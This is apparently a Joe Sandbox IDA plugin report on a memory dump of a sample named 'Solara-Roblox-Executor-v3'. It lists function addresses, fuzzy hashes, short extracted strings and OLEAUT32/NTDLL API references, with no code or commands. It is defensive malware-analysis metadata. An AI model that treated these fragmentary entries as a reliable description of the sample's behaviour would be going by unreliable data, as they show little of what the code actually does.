Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: vZA
API String ID: 0-4004645160
Opcode ID: 13b8d5055627cfcfc1dafa37139e628654c647c8657d1170860fa58ccbf77abd
Instruction ID: f9d1d9ee12f03e56123ed2661192a81acfce358c0f116984d69733c2c3d591ec
Opcode Fuzzy Hash: 13b8d5055627cfcfc1dafa37139e628654c647c8657d1170860fa58ccbf77abd
Instruction Fuzzy Hash: 1B816B76508791CFD3248F38C8817FBBBE2EBC6310F29892DD4D597292DA348846CB95

Function 004160E7 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

vZA, xrefs: 004163F6, 0041642F

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID: vZA
API String ID: 2994545307-4004645160
Opcode ID: f42c1a96a6d5377d7f2e0dfaa9194a0fc2476c6f0d7a5de04e450a85d1cf9de9
Instruction ID: 0301ba2eaba80f64e49771fcbfe0c4531ad3b70218d3c12d047cc2cf6d4005f7
Opcode Fuzzy Hash: f42c1a96a6d5377d7f2e0dfaa9194a0fc2476c6f0d7a5de04e450a85d1cf9de9
Instruction Fuzzy Hash: 4591E5367047504BD7348F28CC857BBB6E2EBC9324F2AC93ED5D9D7292EA3098418749

Function 00428423 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

k, xrefs: 0042845B

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-140662621
Opcode ID: 98266945617647bfc625732d04fab6b99e702a1ecc22344a9a87c1c7fc8e0fb1
Instruction ID: 5791e815fe6cd2624d956546341e36b4c07097eda1d393422b039d9f971ed13b
Opcode Fuzzy Hash: 98266945617647bfc625732d04fab6b99e702a1ecc22344a9a87c1c7fc8e0fb1
Instruction Fuzzy Hash: 569134B55083519FD7208F18C49276FBBF1EF86314F54892DE5D58B392EA38E805CB4A

Function 0043E630 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

pC, xrefs: 0043E714

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: pC
API String ID: 0-3243261774
Opcode ID: 3f81bd3b0951d299f0445af839adc06fc0b6082c96b4b6e88ec81782c4d4f3e0
Instruction ID: 1d64bfa28b4185acc1c8aa400ecd843ade2c7c2ca0c126c0d533da78a7176681
Opcode Fuzzy Hash: 3f81bd3b0951d299f0445af839adc06fc0b6082c96b4b6e88ec81782c4d4f3e0
Instruction Fuzzy Hash: 1461F2382092948FC3048F35D8902ABBBE3EB9A300F49887EE4D987791DB35C906CB15

Function 00417058 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

XrA, xrefs: 00417252

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: XrA
API String ID: 0-2168245352
Opcode ID: 6d943a0aa7fed89fa4e81b5142dab2f0dd33ff45113573d2e2ccf0d36db65168
Instruction ID: 25ae27eff3f3ac1d243a6df6d11571b51b9a22a618fb34a09c85d0d2125aacba
Opcode Fuzzy Hash: 6d943a0aa7fed89fa4e81b5142dab2f0dd33ff45113573d2e2ccf0d36db65168
Instruction Fuzzy Hash: 34514A71A4C35187D7288B29CC613E7B7F2EFD6310F1D856ED4D98B381E63898428746

Function 00417CC7 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

m, xrefs: 00417E84

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 227a78e8d719c6eb118df39e5c65f60e2cb1495bcd6f4bc87d9297fda920b824
Instruction ID: 861d83e90e53fffc98a9b64a8b80c363e01fb939021e35b4241f0e71cb4f6f9e
Opcode Fuzzy Hash: 227a78e8d719c6eb118df39e5c65f60e2cb1495bcd6f4bc87d9297fda920b824
Instruction Fuzzy Hash: 65516B76A593419BE3308F25DC467ABB6E2EBC1304F18893EE98893251DA395D058B86

Function 0042635C Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

;joh, xrefs: 004263FD

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: ;joh
API String ID: 0-3793907784
Opcode ID: 9785efcf7558105071ba36050dcb2f19a5dbd97bde5d09413a6135ff73efbfbd
Instruction ID: 8ffd483ffe66407f984db089c0a959bc8aa016e12d74a43f550b4d5db4991717
Opcode Fuzzy Hash: 9785efcf7558105071ba36050dcb2f19a5dbd97bde5d09413a6135ff73efbfbd
Instruction Fuzzy Hash: 82213775A092108BC710BF25BC8106BB3E4DF92324F45083EF9C287292E639A4258B1B

Function 004073A0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59257bfb213a6ea261c930a839d380230a1575dff23625d49938fe93cf6fba1
Instruction ID: bd56c610aac472dacfa456dd98cf8d0a7e8ee7f0f7949810c19790630cd9a0f1
Opcode Fuzzy Hash: f59257bfb213a6ea261c930a839d380230a1575dff23625d49938fe93cf6fba1
Instruction Fuzzy Hash: 3622B372A087118BC725DE18D9806ABB3E1FFC4319F19893ED986A7385D738B815CB47

Function 00437F50 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66425b946a06d4050dd5440c1168a7114e64d0220f4ac06e1f8f511980b602d5
Instruction ID: dec404e15bb8dc3cabf0ac9761b7cd40cf2e58a9b4aeaeca4b92df2f9fe2dbcb
Opcode Fuzzy Hash: 66425b946a06d4050dd5440c1168a7114e64d0220f4ac06e1f8f511980b602d5
Instruction Fuzzy Hash: 3CC166716083104BD724CF25CD8163FF7A2EBCA718F14692EF48567391DA39EC06879A

Function 00414EA0 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ea95c158cf5fe4e1c6afcf3ad7a96f4e71b2de22238e8511255d1fd545b091
Instruction ID: d0ebca6db4d6d11834990b0b9525ebe66ae7da078b46021663113346224e1f62
Opcode Fuzzy Hash: d9ea95c158cf5fe4e1c6afcf3ad7a96f4e71b2de22238e8511255d1fd545b091
Instruction Fuzzy Hash: 76914479608301DFEB149F15E8417BFB7A2FBC6314F05083EE585132A2D739A956CB8A

Function 0043DAC5 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0226264b3b0475b6b8f41913e1bb1e0e2e4314843019dc07a5c0d8939cde22bd
Instruction ID: 32ace9cc5288d546b1f05e36ee7d838c7c8a4eea2395ecc4371e8b9e847046d8
Opcode Fuzzy Hash: 0226264b3b0475b6b8f41913e1bb1e0e2e4314843019dc07a5c0d8939cde22bd
Instruction Fuzzy Hash: 68513A76A0C3654BD308CE29A89062BB7D2D7CE260F1AA93ED4A1C73C1D67C8C069745

Function 0043AE40 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d341907e5d1c876463b0995d5702560af30785f2fdc26ede0bbe9352396c83
Instruction ID: 2f9b7cec203dc5887a5ad9a703a881c7e18b8b4b24f2af3de7fe9f26cd3bf34d
Opcode Fuzzy Hash: 69d341907e5d1c876463b0995d5702560af30785f2fdc26ede0bbe9352396c83
Instruction Fuzzy Hash: 6A515835B443114BDB2C8A29CCA537FBBE2EBC9320F14952EE5D587391E6389C51C786

Function 00437D00 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4250b2b93df790e5e465d348d8a83d9dde9621fe55ed2acdcabfd21b7744ba
Instruction ID: 6f94ba384be2c262bb28aa4e7449259316b8352a2d70bedb04b72604ba626479
Opcode Fuzzy Hash: cf4250b2b93df790e5e465d348d8a83d9dde9621fe55ed2acdcabfd21b7744ba
Instruction Fuzzy Hash: 165103B420C3059BE7209F25D981B3FB7E5EB89708F00983DF98583292DB75D816D75A

Function 00426820 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6635a7d56ccd33bed45699a5fd131c25d546a79494d7c8924a4ba432fa39d0
Instruction ID: b50522fe2cb7ed70975191dc4218217dddb65d0a905e41cecbe62661a19b3933
Opcode Fuzzy Hash: 6b6635a7d56ccd33bed45699a5fd131c25d546a79494d7c8924a4ba432fa39d0
Instruction Fuzzy Hash: 8251F0B5A483948FD3249F66984426BFBE2FBC5704F158A1CE1C45B354DBB8C806CF86

Function 00416ED8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35238e68626c916a4472fff1307ff7c76df2c4a13534bf32289f0458eb4a601c
Instruction ID: a5727348541ff3d7a9ebe3106d652229288bf4a21cf1a6f639bb09c352ee9142
Opcode Fuzzy Hash: 35238e68626c916a4472fff1307ff7c76df2c4a13534bf32289f0458eb4a601c
Instruction Fuzzy Hash: DC3195767043604FD324CF3CD9802ABBAD2ABC9724F1A4A2ED4D9D7351DA30D841CB89

Function 0041C7A2 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfaccb04d8136356fd8b8992969fa8c4b28e9094eac0a04ae6e236a8315cff8
Instruction ID: 233f906ac5ebf9a505ba12f712a9ea2e0bdf5b49ec8084454082a2f6121882c0
Opcode Fuzzy Hash: ddfaccb04d8136356fd8b8992969fa8c4b28e9094eac0a04ae6e236a8315cff8
Instruction Fuzzy Hash: 29218A31A49340ABDB119F28CC4166EB7A1EB91721F148A6FF8D4633E0D7348847C787

Function 0043B060 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5d084f8aeba105c39c5887f5fececc6fe2a043df4080d6db0499556a032d33
Instruction ID: 37e4388d1978ffd58c1dad855a8ec426e1f47d60b2639358f355cbf5e3a6b588
Opcode Fuzzy Hash: dd5d084f8aeba105c39c5887f5fececc6fe2a043df4080d6db0499556a032d33
Instruction Fuzzy Hash: 96117A367446148BD3144A1A9CC0BBBB7ABE7DE324F25A22FD2E453211E669880587E5

Function 004255F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028c749e21533b641ab91f168d681706c5995d8384776552e6cfd30855e8d9c6
Instruction ID: 57cd1ee36810f2ff86c1b162723dc3e83fe3fb41b353d3cb6405918fa605100d
Opcode Fuzzy Hash: 028c749e21533b641ab91f168d681706c5995d8384776552e6cfd30855e8d9c6
Instruction Fuzzy Hash: 74112536728521DFDB18CF20E85093BB3A2EB95351FC4882DE44663216D6309D40CBC9

Function 00434C50 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: eb79c2ea13a487a2f8b37539e95352bc93b8a764a1ebf09b8d11b4b0c6cbc38d
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4911E933B061D40EC3168D3D84005E5BFA31AE7234F5A639AF4B49B2D2D6269D8A9359

Function 0042A2E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a41cd55c36b8c37cf059e6c754260814cc8a1cd79ac80701d5382ae4533c09
Instruction ID: 4d40434602527fb75b1a8814758078dc4aa516edfbf81ae9127f196bbad4f78e
Opcode Fuzzy Hash: 11a41cd55c36b8c37cf059e6c754260814cc8a1cd79ac80701d5382ae4533c09
Instruction Fuzzy Hash: E6019EB1B0031147D620DE55A4C172BA2A96B81708F48443EEC0457342DB7EFC25C6AF

Function 0043C8EF Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3f5a9a947cd2f51a9ca2798e5224c34a83f88a978d860e7ab2107b3778c8a3
Instruction ID: 3b54dafdd60cb9998b17963ff08630d60bcd28773f36e83821d069ea7fbf14f2
Opcode Fuzzy Hash: 0f3f5a9a947cd2f51a9ca2798e5224c34a83f88a978d860e7ab2107b3778c8a3
Instruction Fuzzy Hash: 5B1191B85193528BD708CF11C46027FF7E1BFD6305F59AA6DE0C6B7284DB38850A8785

Function 0040D32F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a5a0498a2ca717862ac1edb51e0a3e01d30a16187560080d7b2d8d0b4e7f4c8
Instruction ID: c9b40b6696d0b5d8763caf57dace5f7f4264a8846c4449b249e5ba5a2ddbd6d7
Opcode Fuzzy Hash: 9a5a0498a2ca717862ac1edb51e0a3e01d30a16187560080d7b2d8d0b4e7f4c8
Instruction Fuzzy Hash: B6112134A183018BE3289F18D884B7BB3A29782304F18953DE482A32A5DA389845875A

Function 00402B40 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d393c868fd884853acbd059e73d317f9746b4a4db931b2f0e4a7942529d2fc91
Instruction ID: 1da8381dc618a4ca9e187296dba6fe87a3d57480a9db781e0152572e60b0f2e6
Opcode Fuzzy Hash: d393c868fd884853acbd059e73d317f9746b4a4db931b2f0e4a7942529d2fc91
Instruction Fuzzy Hash: 0AF02B7A7541160BE318DE56DDE4937F3A6E7CA315B09103EDA42A33C1CD70F806C2A8

Function 0042D109 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d820f2525bf6738c434d1d264c0eef3ea5f0325e212c5b7954f03666a1fbfa8
Instruction ID: 3a9f141e8853988b7f3f2cb970a468bb38eb4a159b4113e07dfb1bddb429e840
Opcode Fuzzy Hash: 7d820f2525bf6738c434d1d264c0eef3ea5f0325e212c5b7954f03666a1fbfa8
Instruction Fuzzy Hash: 0BE02B2BA1869047CB198F349D10372BFA75793284F29945EC8C857343C97AC10D830D

Function 0042F107 Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 116COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0042F123

Strings

>, xrefs: 0042F22A
:, xrefs: 0042F23A
$, xrefs: 0042F252
d, xrefs: 0042F152
b, xrefs: 0042F15A
<, xrefs: 0042F232
3, xrefs: 0042F19E
x, xrefs: 0042F142
M, xrefs: 0042F176
z, xrefs: 0042F13A
n, xrefs: 0042F16A
j, xrefs: 0042F17A
8, xrefs: 0042F242
l, xrefs: 0042F172
h, xrefs: 0042F182
f, xrefs: 0042F14A
`, xrefs: 0042F162
0, xrefs: 0042F222
6, xrefs: 0042F20A
&, xrefs: 0042F24A
4, xrefs: 0042F212
2, xrefs: 0042F21A
', xrefs: 0042F24E
A, xrefs: 0042F166

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeString
String ID: $$&$'$0$2$3$4$6$8$:$<$>$A$M$`$b$d$f$h$j$l$n$x$z
API String ID: 3341692771-2798740646
Opcode ID: e4424fe02cabf2eef7868ef0d4fe750f5292a7dbf2f3587da169bafcce8048c1
Instruction ID: bdefc1d523b1e1e4b876f841dfe97036a6c04c9792d8bba4e8d9b479cf49ee7e
Opcode Fuzzy Hash: e4424fe02cabf2eef7868ef0d4fe750f5292a7dbf2f3587da169bafcce8048c1
Instruction Fuzzy Hash: 6E61E2501087C1C9DB66CF3C88D87463E915B67228F4D83D9D9E54F2EBC2AAC15AC37A

Function 00430FBB Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 107COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00430FC7

Strings

A, xrefs: 0043100A
h, xrefs: 00431026
<, xrefs: 004310D6
8, xrefs: 004310E6
$, xrefs: 004310F6
&, xrefs: 004310EE
x, xrefs: 00430FE6
d, xrefs: 00430FF6
6, xrefs: 004310AE
M, xrefs: 0043101A
b, xrefs: 00430FFE
0, xrefs: 004310C6
3, xrefs: 00431042
', xrefs: 004310F2
z, xrefs: 00430FDE
>, xrefs: 004310CE
:, xrefs: 004310DE
n, xrefs: 0043100E
2, xrefs: 004310BE
f, xrefs: 00430FEE
j, xrefs: 0043101E
4, xrefs: 004310B6
`, xrefs: 00431006
l, xrefs: 00431016

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeString
String ID: $$&$'$0$2$3$4$6$8$:$<$>$A$M$`$b$d$f$h$j$l$n$x$z
API String ID: 3341692771-2798740646
Opcode ID: 23c87b1005df28f046aa6d11634136e20f3720700c2db750913fe18d8626ca0d
Instruction ID: f20ee076b3de27c2360345ad14065d5581df04eaa58cf06636bdff4231e55c6b
Opcode Fuzzy Hash: 23c87b1005df28f046aa6d11634136e20f3720700c2db750913fe18d8626ca0d
Instruction Fuzzy Hash: 3C51C2501087C1C9DB66CF3C88D87463E911B67228F4D83C9D9E54F2EBD2AAC15AC37A

Function 004328CF Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432909

Strings

", xrefs: 00432976
X, xrefs: 00432958
., xrefs: 0043298A
R, xrefs: 00432926
Z, xrefs: 0043294E
&, xrefs: 00432962
P, xrefs: 00432930
^, xrefs: 0043293A
,, xrefs: 00432994
$, xrefs: 0043296C
, xrefs: 00432980
\, xrefs: 00432944
/, xrefs: 0043298F

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitVariant
String ID: $"$$$&$,$.$/$P$R$X$Z$\$^
API String ID: 1927566239-1507953242
Opcode ID: 2a30aace7e4f930d3a8f08f4125093141b279f979fbb3f317766bee768b74d85
Instruction ID: 3401b22b5b9fc65170e7816df40051b5045129c6ff91689df790f6e397e48a22
Opcode Fuzzy Hash: 2a30aace7e4f930d3a8f08f4125093141b279f979fbb3f317766bee768b74d85
Instruction Fuzzy Hash: A9412A7010C7C18AD365DB38C59834BBFD19B96228F085A9CE4E91B3D6C7B98105C767

Function 00432A3A Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 79COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432A6D

Strings

&, xrefs: 00432AC6
,, xrefs: 00432AF8
, xrefs: 00432AE4
/, xrefs: 00432AF3
Z, xrefs: 00432AB2
", xrefs: 00432ADA
^, xrefs: 00432A9E
X, xrefs: 00432ABC
P, xrefs: 00432A94
R, xrefs: 00432A8A
\, xrefs: 00432AA8
., xrefs: 00432AEE
$, xrefs: 00432AD0

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitVariant
String ID: $"$$$&$,$.$/$P$R$X$Z$\$^
API String ID: 1927566239-1507953242
Opcode ID: 9c4e9196b5b55551b594d6d6eaeb3c55c10473850b04ab1867b9fac711fdfe38
Instruction ID: 4e355202c2fbc180d5219c122ceef1732365bf9cbae1d26078e11fff2d123c82
Opcode Fuzzy Hash: 9c4e9196b5b55551b594d6d6eaeb3c55c10473850b04ab1867b9fac711fdfe38
Instruction Fuzzy Hash: 01413A7400C7C18ED366DB28C49874BBFE16B96228F489B9CE0E54B2D6C7B98509CB57

Function 004303BC Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 72COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004303C2

Strings

~, xrefs: 004303FD
d, xrefs: 004303E5
`, xrefs: 004303F5
f, xrefs: 004303DD
|, xrefs: 00430405
b, xrefs: 004303ED
x, xrefs: 00430415
z, xrefs: 0043040D
{, xrefs: 00430411

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitVariant
String ID: `$b$d$f$x$z${$|$~
API String ID: 1927566239-877673820
Opcode ID: dc1adf4479a58d8797e3600710b90eb8f1546a8639fe43e8684fa11a3095980d
Instruction ID: 73642d0edf263419d20e1e21b8d240117004e5cb187e3124c968d2f61467aee4
Opcode Fuzzy Hash: dc1adf4479a58d8797e3600710b90eb8f1546a8639fe43e8684fa11a3095980d
Instruction Fuzzy Hash: C8314630209B818ED711CF3CC594702BFE1AF5A324F08C69CD5A94F3EAC279A005CB66

Function 0042EACE Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 66COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042EAD4

Strings

~, xrefs: 0042EB15
{, xrefs: 0042EB29
z, xrefs: 0042EB25
b, xrefs: 0042EB05
`, xrefs: 0042EB0D
f, xrefs: 0042EAF5
x, xrefs: 0042EB2D
|, xrefs: 0042EB1D
d, xrefs: 0042EAFD

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitVariant
String ID: `$b$d$f$x$z${$|$~
API String ID: 1927566239-877673820
Opcode ID: 798dc54348ca299f373dbb31f95c63647fb7b80f40b3ea1070f0d53bb4d645ee
Instruction ID: f87653851ce7f7fb69c0aa61d833cd83870d97243b134dde3a0020ed5cd17d71
Opcode Fuzzy Hash: 798dc54348ca299f373dbb31f95c63647fb7b80f40b3ea1070f0d53bb4d645ee
Instruction Fuzzy Hash: A2311630208B818ED711CF7CC484716BFE1AB5A324F08C69DD4E98F3EAC679A405CB66

Function 00432198 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004321F3

Strings

0, xrefs: 00432482
f, xrefs: 0043230C
q, xrefs: 0043235C
}, xrefs: 004323BC

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AllocString
String ID: 0$f$q$}
API String ID: 2525500382-444557768
Opcode ID: 1e7447d7197a742be0a0a142cf4f0ec851b1e73fea7ea62d2db8e03098ee4be4
Instruction ID: 27a5e2d91190e76d882bfb83d9b17f20158c9ceb8bbe4268355428f1bf3c7715
Opcode Fuzzy Hash: 1e7447d7197a742be0a0a142cf4f0ec851b1e73fea7ea62d2db8e03098ee4be4
Instruction Fuzzy Hash: 52818F2010DBC28ED3328B3C8848B8BBED15BA7234F184B9DE1F95B2E6D7644546C767

Function 004236C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 004237BC

Strings

s_,Y, xrefs: 00423720
+Ku, xrefs: 004236F2
rs, xrefs: 00423709

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

